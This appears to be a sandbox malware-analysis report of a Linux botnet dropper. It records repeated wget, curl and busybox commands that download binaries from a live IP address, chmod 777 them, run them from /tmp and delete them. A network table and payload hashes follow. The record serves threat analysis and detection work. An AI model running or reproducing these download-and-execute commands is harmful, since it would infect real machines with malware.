[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/chmod

[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC

[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/rm

[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/wget

[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/chmod

[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm

[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/rm

[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/chmod

[chmod 777 ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/tmp/ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad

[./ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/bin/rm

[rm ICB8C5Yc3oHcodVdcKKZMAJirxuiLVc5Ad]

/usr/bin/wget

[wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/chmod

[chmod 777 q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/tmp/q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff

[./q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/bin/rm

[rm q0BsMeHJ1DP0njz40UPgh5zIC1oY7JXTff]

/usr/bin/wget

[wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/chmod

[chmod 777 KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/tmp/KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp

[./KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/bin/rm

[rm KjdXLyKQeWfdyBEwQkE5WGtQeVv1tCI2Sp]

/usr/bin/wget

[wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/chmod

[chmod 777 yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/tmp/yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV

[./yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/bin/rm

[rm yVQiBcOU0XgDAdH5amMnjEj4kzaCP6sIzV]

/usr/bin/wget

[wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/chmod

[chmod 777 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/tmp/3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3

[./3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/bin/rm

[rm 3wjKNQukH3zPDu3GUc3pHuzwNAme9R26N3]

/usr/bin/wget

[wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/chmod

[chmod 777 aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/tmp/aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl

[./aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/bin/rm

[rm aJ8mBEw8J1n9iF9DmEWtYKluBtVnfHaMcl]

/usr/bin/wget

[wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/chmod

[chmod 777 c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/tmp/c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV

[./c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/bin/rm

[rm c8HPjDdggg6ogMyTV13xZmw0Xkrp7JMGHV]

/usr/bin/wget

[wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/chmod

[chmod 777 fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

[./fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/bin/rm

[rm fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC]

/usr/bin/wget

[wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/chmod

[chmod 777 l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/tmp/l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe

[./l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/bin/rm

[rm l2NdBtLTU30xzBIFpI2vEhX33o2MOa6fEe]

/usr/bin/wget

[wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/chmod

[chmod 777 vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/tmp/vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB

[./vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/bin/rm

[rm vU5kFZPMpyNOgBniLlsIpp016QT8mdS7hB]

/usr/bin/wget

[wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/chmod

[chmod 777 mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/tmp/mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr

[./mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/bin/rm

[rm mJVM976eVjlNBG36PeXQljWUiqGpSHpjvr]

/usr/bin/wget

[wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/chmod

[chmod 777 EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/tmp/EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm

[./EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/bin/rm

[rm EhPlGzZ4huBRFXoDM2NqgprO85Hjsg9lVm]

/usr/bin/wget

[wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/chmod

[chmod 777 Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/tmp/Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr

[./Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/bin/rm

[rm Eao8yBxakfFhFBrYulCxwHkhogfz62WuMr]

/usr/bin/wget

[wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/usr/bin/curl

[curl -O http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/busybox

[/bin/busybox wget http://87.120.126.196/bins/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/chmod

[chmod 777 PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/tmp/PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC

[./PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

/bin/rm

[rm PR9ws5Ov1kUsYoBhMyIvYtLBxw9dyJzDTC]

Network

Country Destination Domain Proto
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp
BG 87.120.126.196:80 87.120.126.196 tcp

Files

/tmp/fSFg8CYsr2jNHC8YKDet8exWxLqqmxltXC

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97